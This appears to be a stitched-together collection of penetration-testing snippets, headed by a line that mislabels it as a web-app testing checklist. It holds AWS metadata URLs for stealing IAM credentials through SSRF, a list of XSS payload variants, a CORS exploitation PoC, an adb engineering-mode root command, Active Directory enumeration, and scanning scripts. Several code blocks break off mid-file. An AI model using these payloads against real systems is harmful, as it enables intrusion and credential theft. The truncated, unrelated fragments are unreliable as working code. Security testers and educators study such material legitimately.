A combination of my own methodology and the Web Application Hacker's Handbook Task checklist, as a Github-Flavored Markdown file
```powershell
# NOTE: the most updated version of PowerView (http://www.harmj0y.net/blog/powershell/make-powerview-great-again/)
# has an updated tricks Gist at https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993
# get all the groups a user is effectively a member of, 'recursing up'
Get-NetGroup -UserName <USER>
# get all the effective members of a group, 'recursing down'
Get-NetGroupMember -GroupName <GROUP> -Recurse
# get the effective set of users who can administer a server
```
```text
## AWS
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
```
```bash
#!/bin/bash
# this tool will automate firmware extraction and unpacking using FT232R-type adaptors (like BusPirate) and a SOIC clip placed on a chip to dump
# install the necessary software:
#$ sudo apt install flashrom binwalk || echo 'git clone?'
# pump up binwalk with additional packages and libraries
#$ bash <(curl -s https://raw.githubusercontent.com/devttys0/binwalk/master/deps.sh)
# place the clip on the chip, connect it to the adaptor, which should be connected to your PC (with drivers installed), and launch the script:
# chip => clip => adaptor => PC => script
```
```javascript
// How many ways can you alert(document.domain)?
// Comment with more ways and I'll add them :)
// I already know about the JSFuck way, but it's too long to add (:
// Direct invocation
alert(document.domain);
(alert)(document.domain);
al\u0065rt(document.domain);
al\u{65}rt(document.domain);
window['alert'](document.domain);
```
```html
<html>
<script src="https://code.jquery.com/jquery-3.2.1.min.js"></script>
<h1>CORS Test PoC</h1>
<label for="target_url">Endpoint to test: </label><input type="url" id="target_url" size=100 placeholder="Target URL"><br/>
<input type="checkbox" id="with_creds_checkbox" value="with_creds"><label for="with_creds_checkbox">With Credentials?</label><br/>
<input type="submit" id="submit_btn" value="Make Request">
<hr>
<p>If the site is vulnerable to an overly permissive CORS policy, the response of the above request will appear in the box below</p>
<div id="test_data" style="border:1px solid darkred; color: red">
```
Gain adb root

```shell
$ adb shell am start -n com.android.engineeringmode/.qualcomm.DiagEnabled --es "code" "angela"
```

Download Magisk-v14.0 and extract it somewhere. Download MagiskManager.
```python
#!/usr/bin/env python
# DiabloHorn - https://diablohorn.com
# scan target IP from an interface with no IP configured
# POC - scapy
# pkt = Ether(dst='00:0c:29:f6:a5:65',src='00:08:19:2c:e0:15') / IP(dst='172.16.218.178',src='172.16.218.255') / TCP(dport=445,flags='S')
# sendp(pkt,iface='eth0')
import sys
from scapy.all import *
```
```bash
if [ "$#" -ne 3 ]; then
    echo "Usage: nmap-tcp-full.sh <TCP-QUICK-RESULTS.XML> <TARGET> <OUTPUT-FILENAME>"
    exit 1
fi
# pull the open TCP port ids out of the quick-scan XML and feed them to a full service/version scan
nmap -nvv -Pn -sSV -T1 -p"$(grep portid "$1" | grep 'protocol="tcp"' | cut -d'"' -f4 | paste -sd "," -)" --version-intensity 9 -A -oA "$3" "$2"
```
```python
#!/usr/bin/env python
#
# Title: lookupadmins.py
# Author: @ropnop
# Description: Python script using Impacket to query members of the builtin Administrators group through SAMR
# Similar in function to Get-NetLocalGroup from Powerview
# Won't work against Windows 10 Anniversary Edition unless you already have local admin
# See: http://www.securityweek.com/microsoft-experts-launch-anti-recon-tool-windows-10-server-2016
#
# Heavily based on original Impacket example scripts written by @agsolino and available here: https://github.com/CoreSecurity/impacket
```